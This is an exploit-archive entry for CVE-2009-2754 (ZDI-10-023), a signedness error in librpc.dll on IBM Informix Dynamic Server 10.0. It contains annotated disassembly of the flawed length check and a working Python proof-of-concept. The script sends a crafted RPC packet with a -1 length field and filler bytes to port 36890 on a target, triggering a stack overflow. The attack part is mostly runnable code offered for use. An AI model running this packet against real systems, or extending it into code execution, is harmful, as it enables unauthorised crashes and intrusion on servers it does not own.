librpc.dll Signedness Error Remote Code Execution

`  
  
# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability  
# Date: 2010-04-08  
# Author: ZSploit.com  
# Software Link: N/A  
# Version: N/A  
# Tested on: IBM Informix Dynamic Server 10.0  
# CVE : CVE-2009-2754  
  
#! /usr/bin/env python  
###############################################################################  
## File : zs_ids_rpc.py  
## Description:  
## :  
## Created_On : Mar 21 2010  
##  
## (c) Copyright 2010, ZSploit.com. all rights reserved.  
###############################################################################  
"""  
The issue in __lgto_svcauth_unix():  
  
.text:1000B8E1 mov [ebp+0], eax  
.text:1000B8E4 mov eax, [ebx]  
.text:1000B8E6 push eax ; netlong  
.text:1000B8E7 add ebx, 4  
.text:1000B8EA call esi ; ntohl ; Get length of hostname  
.text:1000B8EC cmp eax, 0FFh ; Signedness error, if we give 0xffffffff(-1) will pass this check  
.text:1000B8F1 jle short loc_1000B8FD  
.text:1000B8F3 mov esi, 1  
.text:1000B8F8 jmp loc_1000B9D5  
.text:1000B8FD ; ---------------------------------------------------------------------------  
.text:1000B8FD  
.text:1000B8FD loc_1000B8FD: ; CODE XREF: __lgto_svcauth_unix+71j  
.text:1000B8FD mov edi, [ebp+4]  
.text:1000B900 mov ecx, eax  
.text:1000B902 mov edx, ecx  
.text:1000B904 mov esi, ebx  
.text:1000B906 shr ecx, 2  
.text:1000B909 rep movsd ; call memcpy here with user-supplied size cause a stack overflow  
.text:1000B90B mov ecx, edx  
.text:1000B90D add eax, 3  
.text:1000B910 and ecx, 3  
.text:1000B913 rep movsb  
"""  
  
import sys  
import socket  
  
if (len(sys.argv) != 2):  
print "Usage:\t%s [target]" % sys.argv[0]  
sys.exit(0)  
  
  
data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \  
"\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \  
"\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \  
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \  
"\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \  
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \  
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \  
"\x00\x00\x00\x00\x00\x00\x00\x00"  
  
host = sys.argv[1]  
port = 36890  
  
print "PoC for ZDI-10-023 by ZSploit.com"  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
s.connect((host, port))  
s.send(data)  
print "Sending payload .."  
except:  
print "Error in send"  
print "Done"  
except:  
print "Error in socket"  
  
The ZSploit Team  
http://zsploit.com  
  
  
  
`